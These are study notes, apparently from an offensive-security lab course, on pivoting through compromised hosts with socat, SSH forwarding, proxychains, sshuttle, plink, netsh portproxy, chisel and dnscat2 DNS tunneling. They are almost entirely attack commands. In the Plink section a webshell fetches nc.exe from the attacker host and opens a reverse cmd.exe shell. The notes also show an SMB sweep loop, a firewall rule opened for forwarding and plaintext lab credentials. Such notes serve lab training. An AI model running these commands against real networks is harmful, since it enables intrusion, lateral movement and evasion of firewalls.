Port Redirection and Tunneling


### Port Forwarding with socat

On CONFLUENCE01, we'll start a verbose (-ddd) Socat process. It

will listen on TCP port 2345 (TCP-LISTEN:2345), fork into a new

subprocess when it receives a connection (fork) instead of dying

after a single connection, then forward all traffic it receives to TCP

port 5432 on PGDATABASE01 (TCP:10.4.50.215:5432)

CONFLUENCE01$ socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432

kali$ psql -h 192.168.50.63 2345 -U postgres

### SSH port forwarding

confluence$ python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh database_admin@10.4.50.215

# in db01 check for open smb hosts
database_admin@pgdatabase01:~$ 
	for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done;
#found 172.16.50.217:445

# local port forwarding with SSH
ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215
#netmap
# kali > confluence > db01 > smb.217

# now open another reverse shell in confluence, than list shares
kali$ smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234
# than connect
smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234

### SSH dynamic Port Forwarding and Proxychains

confluence@confluence01:/opt/atlassian/confluence/bin$ 
	ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215

kali$ tail /etc/proxychains4.conf 
# socks5 192.168.50.63 9999

proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
proxychains nmap -VVV -sT --top-ports=20 -Pn 172.16.50.217

### SSH Remote Port Forwarding

same setup but confluence can only listen on TCP/8090 for firewall rules

so we leverage the ssh client of confluence as the outbound ports are not blocked.

confluence@confluence01:/opt/atlassian/confluence/bin$ 
	ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4
# 127.0.0.1:2345 is the listening remote socket (in kali connection)
# other is forwarding socket

kali$ psql -h 127.0.0.1 2345 -U postgres

now all traffic that goes in 127.0.0.1:2345 will do this route

127.0.0.1:2345 -> ssh client confluence -> forwarding 10.4.50.215

### SSH dynamic remote port forwarding

confluence01$ ssh -N -R 9998 kali@192.168.118.4
#check enstablished connections
ss -ntplu

kali$ tail proxychains4.conf
# socks5 127.0.0.1 9998

kali$ proxychains nmap 10.4.50.64

### SSHuttle

sshuttle is a tool that turns an SSH connection into something similar to a VPN by

setting up local routes that force traffic through the SSH tunnel

it requires root privileges on the SSH client and Python3 on the SSH server

# setup tunneling
confluence@confluence01:/opt/atlassian/confluence/bin$ 
	socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22

kaliakali:~$ sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24

kaliakali:~$ smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

### ssh.exe

confluence01RDP\> where ssh
ssh -N -R 9998 kali@192.168.118.4

kali$ tail /etc/proxychains4.conf 
# socks5 127.0.0.1 9998 

kali$ proxychains psql -h 10.4.50.215 -U postgres

### Plink

when ssh is not present

# 1 upload webshell and make that pc download nc.exe from our kali host
kali$ sudo system
kali$ sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html

webshell> powershell wget -Uri http://192.168.118.4/nc.exe 
	-OutFile C:\Windows\Temp\nc.exe

webshell> C: \Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446
# same process to download plink.exe in the webshell host

webshell> C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> 
	-R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4

kali@kali:~$ xfreerdp /u:rdp_admin /p: Password! /v:127.0.0.1:9833

### netsh

when Windows is the host that acts as proxy

but inbound traffic is not allowed

but we have admin shell on this windows host

# connect rdp
C:\Windows\system32> netsh interface portproxy add v4tov4 
	listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215

netstat -anp TCP | find "2222"
netsh interface portproxy show all

# We can use the netsh advfirewall firewall subcontext to create the hole
netsh advfirewall firewall add rule name="port_forward_ssh_2222" 
	protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow

#to remove
netsh advfirewall firewall delete rule name="port_forward_ssh _2222"

netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64

### HTTP Tunneling

scenario:

confluence has 8090 inbound only, outbound blocked except for http

tool:

Chisel -> encapsulate traffic through http tunneling 

kali$ chiser server -port 8080 --reverse

victim$ /tmp/chisel client 192.168.118.4:8080 R:socks > /dev/null 2>&1 & 

#Now we'll pass an Ncat command to ProxyCommand
kali$ ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' 
	database_admin@10.4.50.215

### DNS Tunneling

how to perform DNS tunneling with a tool called dnscat2

#  we need to initiate DNS requests from PGDATABASE01,
# and monitor what comes in to FELINEAUTHORITY

felineauthority:~$ cd dns_tunneling
cat dnsmasq.conf
	# Define the zone
	auth-zone=feline.corp
	auth-server=feline.corp

sudo dnsmasq -C dnsmasq.conf -d

pgdatabase01:~$ resolvectl status
nslookup exfiltrated-data.feline.corp

felineauthority:~$ cat dnsmasq_txt.conf
	# Define the zone
	auth-zone=feline.corp
	auth-server=feline.corp

	# TXT record
	txt-record=www.feline.corp,here's something useful!
	txt-record=www.feline.corp,here's something else less useful.

sudo dnsmasq -C dnsmasq_txt.conf -d

pgdatabase01:~$ nslookup -type=txt www.feline.corp

## start server
felineauthority:~$ dnscat2-server feline.corp

## connect client
pgdatabase01:~/dnscat$ ./dnscat feline.corp

## interactive
felineauthority:~$ dnscat2> windows
windows -i 1
listen 127.0.0.1:4455 172.16.50.217:445
smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome123